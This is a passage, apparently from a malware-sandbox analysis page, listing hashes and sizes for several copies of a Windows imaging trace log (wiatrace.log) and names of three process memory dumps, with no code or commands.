88918fd427f29abd0c3b15d8a518a10e

SHA1
093bb84c23acd1de5a55b7197d584e4ab3ccc7f9

SHA256
ed62555a5e4dcdc95b600154a594a92a798ea0f9d932b4270747b0dcbfef401e

SHA512
4533b453a81892885a0c8b15e390f420cf6a92217bb67db568dc8a4edd21b44ae8d46507433e7af3eef6b8ff793beeafdb30bf38a327a1edc60e5bbd7f705375

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
1KB

MD5
6548a91a605f553d3b8991d01f8c237c

SHA1
0488eb7314794f73adf48b3c9c7b982f8d64d1fb

SHA256
86dd9bc70b82d1da4f43eb0b2138d7022ca6d6b3654557378ad5ac173fccfe9e

SHA512
141ceda907d88cc2af4ef2a1d0d264ed92082a2f71ffda033bb52f5ba1d3d253507418c7adab58211e1c27353e86dddbbb325ff54e96205ac764782cbab3fd53

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
3KB

MD5
8d238b58b93ccec4932094d3e56daa7f

SHA1
007f28f9abb235bda30d4d98352392dc37f32a42

SHA256
8ec7c8cf80ba3607ae3b073beb92c933ab8daeb183e173b7f12273d36e6b1fdf

SHA512
c29fd50aee9d55ea01df254706a627bfedc93d51d2bb0ad2886d883738bacb29b23b8535d35e2287c0fb03d9e6dbb30d4df8b8a9340474680f564473ba1d447d

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
4KB

MD5
91aaaa7ecb003bed76ddb3d26730ba99

SHA1
96b8a034c4d4f5cf50949a2aea3892971162dd4b

SHA256
1736479e503ae958bcea8d6560a96be3ee2f6ffc6867941ca74c634fd93cfebb

SHA512
5b42cce61be9d8dadab77cf59743ee2a866b28781f4781142739ebf4da72eef318a9d5238d0e0afeafdd6da976752ef12c63b595191a23e298154e02ae508d4d

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
6KB

MD5
8985d7f36d606f1bb289f345a53956e4

SHA1
acf410f20cdb8b1333d5f35895d2896eb9f988ab

SHA256
aa9bab3eae8b96112ee8a48327d8a7521b53687f8e470991c98382af3de7b87b

SHA512
c48efc8aafa6084fd0256d29ad21a193ed8e3c359164feaefb7db44e2ad13dc1b6df619d0a48c50a87f33681812cfe3b9488098da4ac59adf0c50d03090b4a25

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
7KB

MD5
361bd4ef293fc0928bc8607e90b61187

SHA1
e7c1c037d74085151fe309536e9a07584755e57d

SHA256
fe85ffb6ee04bea6845bb1259ba5f41dafd72a0381df3228d7da51f567a8b01a

SHA512
d820df330633812de80167f6e37cc77697b1668718fe681b7744a07b07ec6fcdffd58fa19fb099066d58381da63ad303a55e93f8943186eaea672598114c49f1

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
9KB

MD5
0f0971719f5e1f9422a640ec06b93a8c

SHA1
0694c74475f1734d4e1f4d6ba79631224d6536bc

SHA256
f33e829ef1554a47afeccdc1caf17d2832a4c849ae51215ee3ca1ca43a22784e

SHA512
5f1c62941ca89a6b0d96191700dd3b14ecd56dd44a3cf81c7e6b5fb5e85361003bfa75cb5c07feeae6de628bfd2c3f78c3d61495062146a9ff15f34e904c7828

Download Submit
memory/752-0-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

Filesize
1.6MB

Download
memory/752-4-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

Filesize
1.6MB

Download
memory/752-27-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

Filesize
1.6MB

Download